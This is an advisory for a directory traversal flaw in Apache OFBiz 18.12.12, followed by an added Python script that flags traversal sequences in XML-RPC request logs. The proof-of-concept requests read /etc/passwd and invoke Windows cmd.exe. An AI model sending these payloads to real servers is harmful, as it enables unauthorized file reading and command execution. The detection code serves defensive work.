# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal
# Google Dork: N/A
# Date: 2024-05-16
# Exploit Author: Abdualhadi khalifa (https://twitter.com/absholi_ly)
# Vendor Homepage: https://ofbiz.apache.org/
# Software Link: https://ofbiz.apache.org/download.html
# Version: <= 18.12.12
# Tested on: Windows 10

PoC:

1-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

example.createBlogPost
../../../../../../etc/passwd

OR

2-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

performCommand
../../../../../../windows/system32/cmd.exe?/c+dir+c:\
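Added detection example, not part of the advisory above: it scans constructed request-log lines for POSTs to the /webtools/control/xmlrpc endpoint whose body carries a `..` path segment, after percent-decoding (including double encoding) and normalising Windows backslashes, so both PoC payload shapes and their encoded variants are flagged. The log format and sample lines are assumed for illustration.

```python
import re
from urllib.parse import unquote

# Endpoint named in the advisory; traversal sequences in a body sent to it
# are worth an alert regardless of which XML-RPC method is invoked.
XMLRPC_PATH = "/webtools/control/xmlrpc"

# Constructed sample log lines (assumed format: method path status body="...").
SAMPLE_LOG = [
    'POST /webtools/control/xmlrpc 200 body="example.createBlogPost ../../../../../../etc/passwd"',
    'POST /webtools/control/xmlrpc 200 body="performCommand ..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe?/c+dir+c:\\"',
    'POST /webtools/control/xmlrpc 200 body="example.createBlogPost %2e%2e%2f%2e%2e%2fetc%2fpasswd"',
    'POST /webtools/control/xmlrpc 200 body="example.createBlogPost blog/post-1.xml"',
    'GET /images/logo.png 200 body=""',
]

LOG_RE = re.compile(r'^(?P<method>\S+) (?P<path>\S+) (?P<status>\d+) body="(?P<body>.*)"$')
# A ".." segment at the start of a value or after a separator (/, whitespace, '=', '>').
TRAVERSAL_RE = re.compile(r"(^|[/\s=>])\.\.(/|$)")


def normalize(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (catches double encoding), then unify separators."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def has_traversal(body: str) -> bool:
    """True if the normalised body contains a parent-directory path segment."""
    return TRAVERSAL_RE.search(normalize(body)) is not None


def scan(lines):
    """Return (path, body) pairs for XML-RPC requests carrying traversal sequences."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("path") != XMLRPC_PATH:
            continue
        if has_traversal(m.group("body")):
            hits.append((m.group("path"), m.group("body")))
    return hits


if __name__ == "__main__":
    for path, body in scan(SAMPLE_LOG):
        print(f"ALERT traversal to {path}: {body}")
```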